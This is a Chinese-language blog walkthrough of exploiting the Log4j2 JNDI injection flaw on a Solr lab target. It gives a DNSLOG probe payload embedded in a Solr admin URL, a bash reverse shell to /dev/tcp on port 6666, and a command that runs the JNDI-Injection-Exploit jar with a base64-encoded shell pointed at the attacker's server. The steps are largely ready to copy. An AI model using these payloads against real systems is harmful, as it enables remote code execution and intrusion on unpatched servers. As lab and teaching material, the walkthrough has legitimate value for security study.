log4j2漏洞详解

部署运行你感兴趣的模型镜像

打开靶场,先在⾃⼰搭建的DNSLOG平台上获取⼀个域名来监控我们注⼊的效果.

/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.peuuh8.dnslog.cn}

如下图可以查看到记录

准备反弹shell(ip替换为自己攻击机的ip)

bash -i >& /dev/tcp/192.168.159.146/6666 0>&1

把上面反弹shell进行base64编码

模块(使用/JNDI-Injection-Exploit-1.0-SNAPSHOT工具

java -jar target/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,[经过base64编码后的命令]}|{base64,-d}|bash" -A [你的vpsip]

 

以上可以看到有三个服务,看到熟悉的 rmi ldap ,实际上这个jar的作⽤就是帮我
们⽣成了恶意代码类,并且⽣成了对应的url,然后我们就可以回到刚才的⽹站去进⾏JNDI注⼊...
这⾥在注⼊之前另启动⼀个终端开启监听...
把得到的恶意代码类粘在后面
在攻击机监听上面指令中的6666端口
出现结果便可以执行命令

您可能感兴趣的与本文相关的镜像

TensorFlow-v2.15

TensorFlow-v2.15

TensorFlow

TensorFlow 是由Google Brain 团队开发的开源机器学习框架,广泛应用于深度学习研究和生产环境。 它提供了一个灵活的平台,用于构建和训练各种机器学习模型

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值